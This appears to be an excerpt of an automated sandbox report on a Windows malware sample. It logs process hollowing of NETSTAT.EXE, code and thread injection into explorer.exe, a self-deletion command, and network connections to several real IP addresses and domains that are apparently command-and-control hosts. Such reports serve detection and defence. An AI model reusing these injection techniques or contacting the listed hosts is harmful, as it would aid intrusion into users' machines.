Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03504015 mov eax, dword ptr fs:[00000030h] 10_2_03504015
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h] 10_2_034F1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h] 10_2_034B7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h] 10_2_034B7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h] 10_2_034B7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0350740D mov eax, dword ptr fs:[00000030h] 10_2_0350740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0350740D mov eax, dword ptr fs:[00000030h] 10_2_0350740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0350740D mov eax, dword ptr fs:[00000030h] 10_2_0350740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346BC2C mov eax, dword ptr fs:[00000030h] 10_2_0346BC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346002D mov eax, dword ptr fs:[00000030h] 10_2_0346002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346002D mov eax, dword ptr fs:[00000030h] 10_2_0346002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346002D mov eax, dword ptr fs:[00000030h] 10_2_0346002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346002D mov eax, dword ptr fs:[00000030h] 10_2_0346002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346002D mov eax, dword ptr fs:[00000030h] 10_2_0346002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h] 10_2_0344B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h] 10_2_0344B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h] 10_2_0344B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h] 10_2_0344B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508CD6 mov eax, dword ptr fs:[00000030h] 10_2_03508CD6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov ecx, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_034CB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034358EC mov eax, dword ptr fs:[00000030h] 10_2_034358EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F14FB mov eax, dword ptr fs:[00000030h] 10_2_034F14FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_034B6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_034B6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_034B6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439080 mov eax, dword ptr fs:[00000030h] 10_2_03439080
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h] 10_2_034B3884
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h] 10_2_034B3884
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344849B mov eax, dword ptr fs:[00000030h] 10_2_0344849B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034790AF mov eax, dword ptr fs:[00000030h] 10_2_034790AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346F0BF mov ecx, dword ptr fs:[00000030h] 10_2_0346F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h] 10_2_0346F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h] 10_2_0346F0BF
Enables debug privileges
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.241.53.21 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.34.228.66 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sh-zzjy.com
Source: C:\Windows\explorer.exe Network Connect: 156.241.53.248 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 46.137.146.55 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.143.9.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.nirvananaturalcbd.net
Source: C:\Windows\explorer.exe Domain query: www.boicity.com
Source: C:\Windows\explorer.exe Domain query: www.zrcezzfdfkyjlir.com
Source: C:\Windows\explorer.exe Domain query: www.iafzal.com
Source: C:\Windows\explorer.exe Domain query: www.updates-app.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Memory written: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: BB0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' Jump to behavior
Source: explorer.exe, 00000005.00000000.731475226.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
